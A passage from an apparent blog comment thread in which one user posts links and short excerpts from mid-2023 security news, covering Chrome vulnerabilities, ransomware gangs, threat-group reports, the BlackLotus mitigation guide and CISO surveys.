Helsingin yliopiston rikosoikeuden professorin Kimmo Nuotion mukaan kirjauksen taustalla saattaa olla suomalaisen dosentin Johan Bäckmanin kaltaisten henkilöiden toiminta. Mahdollista tulevaa lain kohtaa voi jopa nimittää ”Bäckman-pykäläksi”.
Tomi Engdahl says:
Cooperation or Competition? China’s Security Industry Sees the US, Not AI, as the Bigger Threat
https://www.securityweek.com/cooperation-or-competition-chinas-security-industry-sees-the-us-not-ai-as-the-bigger-threat/
China’s security and surveillance industry is focused on shoring up its vulnerabilities to the US and other outside actors, worried about risks posed by hackers, advances in AI and pressure from rival governments.
Tomi Engdahl says:
CISO Strategy
CISOs’ New Stressors Brought on by Digitalization: Report
https://www.securityweek.com/cisos-new-stressors-brought-on-by-digitalization-report/
Digitalization brings new security challenges, new concerns, and new threats, and CISOs should not think that it’s just business as usual.
Tomi Engdahl says:
Chrome and Its Vulnerabilities – Is the Web Browser Safe to Use?
https://www.securityweek.com/chrome-and-its-vulnerabilities-is-the-web-browser-safe-to-use/
Why are there so many vulnerabilities in Chrome? Is it realistically safe to use? Can Google do anything to make the web browser safer?
Like all major applications, Google’s Chrome suffers from vulnerabilities. During 2022, SecurityWeek reported on 456 vulnerabilities (averaging 38 per month), including nine zero-days. The high number of flaws needing to be patched poses a simple question: is Chrome safe to use?
This high rate of vulnerability disclosures and patches has continued into 2023. Chrome 109 patched 17 and six vulnerabilities in January. Chrome 110 patched 15 vulnerabilities in February; version 111 patched 40 and 8 in March; and version 112 patched 16 in April. April also saw a patch for the second zero-day vulnerability of 2023. Chrome 113 patched 15 vulnerabilities in May, followed by a further 12 vulnerabilities. June started with the third of 2023’s zero-day patches, in Chrome 114, and this was followed by a further 5 patches.
The list is so long it almost becomes boringly repetitive – but it will undoubtedly continue growing through the rest of the year and beyond. The questions raised, however, are not boring. Why are there so many vulnerabilities? Is Chrome realistically safe to use? Can Google do anything to make the product safer? Can users do anything to increase their safety? SecurityWeek talked to Tal Zamir, the CTO at Tel Aviv, Israel-based Perception Point (a detection and response vendor covering major threat surfaces including browsers).
The primary reason for the number of vulnerabilities is basically just statistics. It’s a combination of the size of the codebase, the attraction of the target, and the number of people who use it. “Over the years, Chrome has grown into a huge codebase – almost an operating system like Windows in its size, because it has so many features under the hood,” said Zamir.
The larger the codebase, the greater the number of vulnerabilities. That’s a reality of computing. The more an application is used, the greater the number of attackers looking for ways to attack it. This will include both criminals and nation states and is again inescapable. It’s worth noting that according to Statcounter (May 2023), Chrome had a 62.87% share of the global browser market. Safari was second with 20.7%, while Edge came in third with just 5.32%.
We cannot expect Google to do more to secure its code. This again is an inescapable feature of business life. Google would have to reduce both the quantity and speed with which it introduces new features, and that goes against the grain of ensuring and perhaps increasing market share. Microsoft has always been in catch-up mode for browsers, but now there is a full-fledged battle over the best (that is, most profitable) integration of AI into their products.
“Microsoft is giving Google a real fight,” said Zamir. “This is especially in the enterprise space but also for consumers who are tempted to go with the Microsoft bundles. I predict that it will become even harder for Google to fight and keep its first place in the browser space. In this fight, it will add new features and try to innovate even faster. When you do this, you typically put security as a secondary consideration. Speed is the need – you need to be in front of the users with shiny new things, and security might lag. It doesn’t mean that Google will neglect security. It definitely invests in the security of Chrome – but I think security will be secondary to the new features.”
Where Google cannot be criticized is over its reactive approach to Chrome security. The policy is to seek (by its own research teams and bug bounty program), and then remedy and patch vulnerabilities before they can be abused by attackers.
This is a reactive rather than proactive approach. While Google itself is largely forced by business realities to be reactive on security – and most companies are in the same position – the user can take a more proactive approach. This inevitably involves the addition of specialist security products, such as that from Perception Point, to protect the application and its use.
This raises one further question – if small security firms can protect Chrome, why cannot Google (one of the largest developers in the world) develop similar protection inside Chrome? “Google definitely could,” said Zamir, “if it was willing to invest many years of engineering.”
Technically, it is possible, but economically it is infeasible. We come back to the ‘shiny new thing’ image. For Chrome, the shiny new things are the additional features that make it attractive to users. Invisibly embedded complex security controls do not qualify as shiny new things, so will always be pushed down the priority line. But for a third party security vendor, security is the shiny thing.
Tomi Engdahl says:
David McCabe / New York Times:
Sources: the Biden administration has ramped up exploration of security concerns with Chinese cloud computing firms, potentially fueling tensions with Beijing — The Biden administration is exploring whether it can mount a campaign against Chinese tech giants like Alibaba and Huawei, potentially fueling tensions with Beijing.
https://www.nytimes.com/2023/06/21/technology/china-cloud-computing-concern.html
Tomi Engdahl says:
Threat Intelligence
The Benefits of Red Zone Threat Intelligence
https://www.securityweek.com/the-benefits-of-red-zone-threat-intelligence/
Incorporating Red Zone threat intelligence into your security strategy will help you stay on top of the latest threats and better protect your organization.
Tomi Engdahl says:
https://www.panoptica.app/solutions/cloud-native-application-security-solution?utm_campaign=fy23q4_panoptica_ww_paidmedia&utm_source=securityweek&utm_medium=cpm_awareness&utm_term=bubble-agilitymeetssecurity-learnmore-welcomead&utm_content=solutions-cloud-native-application-security-solution
Tomi Engdahl says:
TikTok’s Answer to Security Concerns? Grant Oracle Full Source Code Access
Oracle will also have access to TikTok’s algorithm and content-moderation material.
https://uk.pcmag.com/social-media/146987/tiktoks-answer-to-security-concerns-grant-oracle-full-source-code-access
Tomi Engdahl says:
https://www.kitploit.com/2023/06/scanner-and-patcher-web-vulnerability.html?fbclid=IwAR3roaDEJUcejXmUwLtz381nFuJ6EJlM-x0e8n4Z3q0RNFts06tVv_7gFu8&m=1
Tomi Engdahl says:
https://www.bleepingcomputer.com/news/security/the-great-exodus-to-telegram-a-tour-of-the-new-cybercrime-underground/
Tomi Engdahl says:
Global CISO survey: digital-first economy introduces unforeseen risks for 89% of CISOs
June 21, 2023
Today’s digital-first economy has transformed the role of the modern CISO, increasing threats and changing security priorities.
https://www.securityinfowatch.com/security-executives/press-release/53064046/salt-security-global-ciso-survey-digitalfirst-economy-introduces-unforeseen-risks-for-89-of-cisos
Tomi Engdahl says:
Popular Android VPN sure looks like a DDoS botnet
BY
MATTHEW ZUCCA
PUBLISHED 15 HOURS AGO
An investigation into the Android app, Swing VPN, suggests potential misuse of users’ devices.
https://www.androidpolice.com/malware-android-vpn-ddos-botnet/
Tomi Engdahl says:
https://nakedsecurity.sophos.com/2023/06/21/beware-bad-passwords-as-attackers-co-opt-linux-servers-into-cybercrime/
Tomi Engdahl says:
German intelligence agency is using NFTs to attract cybersecurity talent
People who wish to mint an NFT in the collection have to participate in the treasure hunt and find a string of characters hidden by the BND.
https://cryptoslate.com/german-intelligence-agency-is-using-nfts-to-attract-cybersecurity-talent/
Tomi Engdahl says:
Docs Show FBI Pressures Cops to Keep Phone Surveillance Secrets
Newly released documents highlight the bureau’s continued secrecy around cell-site simulators—spying tech that everyone already assumes exists.
https://www.wired.com/story/fbi-cell-site-simulator-stingray-secrecy/?fbclid=IwAR0Ke4mvTxW74jlPlvOgVlDQkkWy-In0K_Cf2mEc4HZhd86ozzH4X5Bs1ek
Tomi Engdahl says:
Why Malware Crypting Services Deserve More Scrutiny https://krebsonsecurity.com/2023/06/why-malware-crypting-services-deserve-more-scrutiny/
This story explores the history and identity behind Cryptor[.]biz, a long-running crypting service that is trusted by some of the biggest names in cybercrime.
Tomi Engdahl says:
Ethical Problems in Computer Security
https://www.schneier.com/blog/archives/2023/06/ethical-problems-in-computer-security.html
Tadayoshi Kohno, Yasemin Acar, and Wulf Loh wrote excellent paper on ethical thinking within the computer security community: “Ethical Frameworks and Computer Security Trolley Problems: Foundations for Conversation“.
Tomi Engdahl says:
Paying Ransomware’s Ransom: Why it’s Time to Reconsider https://securityintelligence.com/articles/paying-ransomswares-ransom-why-its-time-to-reconsider/
When ransomware strikes, the biggest question a company has to answer is typically whether to pay the ransom. But paying the ransom is only a fraction of the total cost to a business. In some cases, companies may even face fines for paying up and not even getting their data back.
So why are companies still paying? Why are they not pulling in the experts, such as government support from the FBI or CISA, from the beginning?
Tomi Engdahl says:
Threat Group Assessment: Muddled Libra
https://unit42.paloaltonetworks.com/muddled-libra/
At the intersection of devious social engineering and nimble technology adaptation stands Muddled Libra. With an intimate knowledge of enterprise information technology, this threat group presents a significant risk even to organizations with well-developed legacy cyber defenses.
Muddled Libra is a methodical adversary that poses a substantial threat to organizations in the software automation, BPO, telecommunications and technology industries.
Tomi Engdahl says:
GitHub Dataset Research Reveals Millions Potentially Vulnerable to RepoJacking https://www.bleepingcomputer.com/news/security/millions-of-github-repos-likely-vulnerable-to-repojacking-researchers-say/
Username and repository name changes are frequent on GitHub, as organizations can get new management through acquisition or merger, or they can switch to a new brand name.
When this happens, a redirection is created to avoid breaking dependencies for projects using code from repositories that changed their name; however, if someone registers the old name, that redirection becomes invalid.
RepoJacking is an attack where a malicious actor registers a username and creates a repository used by an organization in the past but which has since changed its name.
Tomi Engdahl says:
It is widely known that passwords are the leading cause of breaches, with 61% of breaches attributed to compromised credentials. Organizations are looking to enforce multi-factor authentication (MFA) to secure their users and data; but not all MFA solutions offer the same sort of protection and are susceptible to compromise by attackers
Tomi Engdahl says:
NSA Releases Guide to Mitigate BlackLotus Threat https://www.nsa.gov/Press-Room/Press-Releases-Statements/Press-Release-View/Article/3435305/nsa-releases-guide-to-mitigate-blacklotus-threat/
Malicious cyber actors could take advantage of a known vulnerability in the Microsoft Windows secure startup process to bypass Secure Boot protection and execute BlackLotus malware.
To guide system administrators and network defenders on how to mitigate this threat, the National Security Agency (NSA) is publicly releasing the “BlackLotus Mitigation Guide” Cybersecurity Information Sheet (CSI). The guide provides an overview of recommended actions to detect and prevent malicious activities associated with BlackLotus
Tomi Engdahl says:
Easy Configuration Fixes Can Protect Your Server from Attack https://securityintelligence.com/articles/easy-configuration-fixes-can-protect-your-server/
Poorly configured web servers are all too common. In fact, a recent study from a firm that indexes internet-facing devices reported that over 8,000 servers hosting sensitive information are not properly configured.
A recent Censys report stated that “data exposures via misconfiguration remain a serious problem. We found over 8,000 servers on the internet hosting potentially sensitive information, including possible credentials, database backups and configuration files.” As per the report, these vulnerabilities were easy to identify, as they would be for even inexperienced threat actors.
Tomi Engdahl says:
IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits https://unit42.paloaltonetworks.com/mirai-variant-targets-iot-exploits/
Since March 2023, Unit 42 researchers have observed threat actors leveraging several IoT vulnerabilities to spread a variant of the Mirai botnet.
The threat actors have the ability to gain complete control over the compromised devices, integrating those devices into the botnet. These devices are then used to execute additional attacks, including distributed denial-of-service (DDoS) attacks.
The widespread adoption of IoT devices has become a ubiquitous trend. However, the persistent security concerns surrounding these devices cannot be ignored.
The Mirai botnet, discovered back in 2016, is still active today. A significant part of the reason for its popularity among threat actors lies in the security flaws of IoT devices.
Tomi Engdahl says:
LockBit Green and phishing that targets organizations https://securelist.com/crimeware-report-lockbit-switchsymb/110068/
In recent months, we published private reports on a broad range of subjects.
We wrote about malware targeting Brazil, about CEO fraud attempts, Andariel, LockBit and others. For this post, we selected three private reports, namely those related to LockBit and phishing campaigns targeting businesses, and prepared excerpts from these.
In contrast to BEC campaigns that are targeted and require significant effort from the criminals, ordinary phishing campaigns are relatively simple. This creates opportunities for automation, of which the SwitchSymb phishing kit is one example.
Tomi Engdahl says:
Cybercrime Group ‘Muddled Libra’ Targets BPO Sector with Advanced Social Engineering https://thehackernews.com/2023/06/cybercrime-group-muddled-libra-targets.html
A threat actor known as Muddled Libra is targeting the business process outsourcing (BPO) industry with persistent attacks that leverage advanced social engineering ploys to gain initial access.
Libra is the designation given by the cybersecurity company for cybercrime groups. The “muddled” moniker for the threat actor stems from the prevailing ambiguity with regards to the use of the 0ktapus framework.
Tomi Engdahl says:
Twitter Hacker Sentenced to 5 Years in Prison for $120,000 Crypto Scam https://thehackernews.com/2023/06/twitter-hacker-sentenced-to-5-years-in.html
A U.K. citizen who took part in the massive July 2020 hack of Twitter has been sentenced to five years in prison in the U.S.
Joseph James O’Connor (aka PlugwalkJoe), 24, was awarded the sentence on Friday in the Southern District of New York, a little over a month after he pleaded guilty to the criminal schemes. He was arrested in Spain in July 2021.
The infamous Twitter breach allowed the defendant and his co-conspirators to obtain unauthorized access to backend tools used by Twitter, abusing them to hijack 130 popular accounts to perpetrate a crypto scam that netted them about
$120,000 in illegal profits.
Tomi Engdahl says:
Checkmate: What Chess Taught Me About Cyber Resilience https://www.forbes.com/sites/forbestechcouncil/2023/06/23/checkmate-what-chess-taught-me-about-cyber-resilience/
In the game of chess, every single move contributes to the overall outcome.
All 16 pawns—the queen, knights, bishops and others—provide unique value to a player. The queen is the most powerful piece of the game and, if used strategically, can protect every other piece.
When investing in cybersecurity, CISOs must strategically place every resource in the right spot. Making the right moves at the right time will ensure the tools, people, practices and processes they invest in can protect their systems, networks and data from a cyberattack or data breach.
Making strategic moves is critical in building a successful and secure business.
A chess player must outsmart their opponent by predicting their next move and subsequently making a move to counteract their opponent. In cybersecurity, security teams must think ahead by putting themselves in the adversary’s shoes.
Tomi Engdahl says:
5 facts to know about the Royal ransomware gang https://www.malwarebytes.com/blog/business/2023/06/5-facts-to-know-about-the-royal-ransomware-gang
When we first introduced the Royal ransomware gang in our November 2022 review, little did we know they’d rapidly evolve into one of the most potent threats in our ongoing monthly threat intelligence briefings.
In fact, the Malwarebytes Threat Intelligence team has tracked down a staggering 195 ransomware incidents credited to Royal from November 2022 to June 2023.
Tomi Engdahl says:
https://www.iltalehti.fi/tietoturva/a/9d6634c7-cc5e-45ea-8a31-8091f06e0b0f
Sähköpostitse leviäviä haittaohjelmia piilotetaan eniten pdf -tiedostoihin, joita lähetetään sähköpostin liitteenä. Tietoturvafirma Palo Alto Networksin raportin mukaan kyseistä tiedostomuotoa käytetään 66,6 prosentissa tapauksista, joissa sähköpostitse pyritään saastuttamaan uhrin kone.
https://start.paloaltonetworks.com/unit-42-network-threat-trends-report-malware-2023.html#register
Tomi Engdahl says:
Lisa O’Carroll / The Guardian:
The EFJ and media experts condemn the latest European Media Freedom Act draft that would let national security agencies place spyware on journalists’ phones
Draft EU plans to allow spying on journalists are dangerous, warn critics
https://www.theguardian.com/world/2023/jun/22/draft-eu-plans-to-allow-spying-on-journalists-are-dangerous-warn-critics
Move to allow spyware to be placed on reporters’ phones would have a ‘chilling effect’, say media experts
Tomi Engdahl says:
https://www.securityweek.com/nsa-issues-guidance-on-mitigating-blacklotus-bootkit-infections/
Tomi Engdahl says:
Bipartisan Bill Proposes Cybersecurity Funds for Rural Water Systems
https://www.securityweek.com/bipartisan-bill-proposes-cybersecurity-funds-for-rural-water-systems/
A new bill proposes to increase cybersecurity funding for rural water systems by $7.5 million dollars per year.
Tomi Engdahl says:
All About PowerShell Attacks: The No. 1 ATT&CK Technique https://securityintelligence.com/articles/all-about-powershell-attacks/
How do cyber pros prioritize their security efforts? A good place to start is knowing exactly what tactics, techniques and procedures (TTP) threat actors use. In a recently published report, aggregated data was used to identify the most common attack techniques as defined by the MITRE ATT&CK framework.
The study revealed that PowerShell Command & Scripting Interpreter was the number one attack technique used by threat actors. PowerShell is a command-line shell and scripting language that is widely used by system administrators and security professionals to automate tasks and manage systems. But threat actors can also use PowerShell to carry out malicious activities on compromised systems.
Tomi Engdahl says:
Inside Threat Actors: Dark Web Forums vs. Illicit Telegram Communities https://www.bleepingcomputer.com/news/security/inside-threat-actors-dark-web-forums-vs-illicit-telegram-communities/
The proliferation of cybercrime on the internet has given rise to thousands of criminal communities. These corners of the internet, often dominated by malicious actors, allow them the space to coordinate and carry out their illegal activities successfully. Commonly, the area of the internet that experts advise has the highest criminal activity is on dark web forums and markets.
More recently, there has been a spike in illicit activities moving into online messaging applications like Telegram. Combined these two facets of cyberspace host a plethora of criminal activities carried out by threat actors.
In this post, we’re going to explore common threat actors and their activities on dark web forums versus illicit Telegram communities. Additionally, we’ll cover core similarities and key differences between each platform in order to better understand that not all cybercriminal based communities are created equally.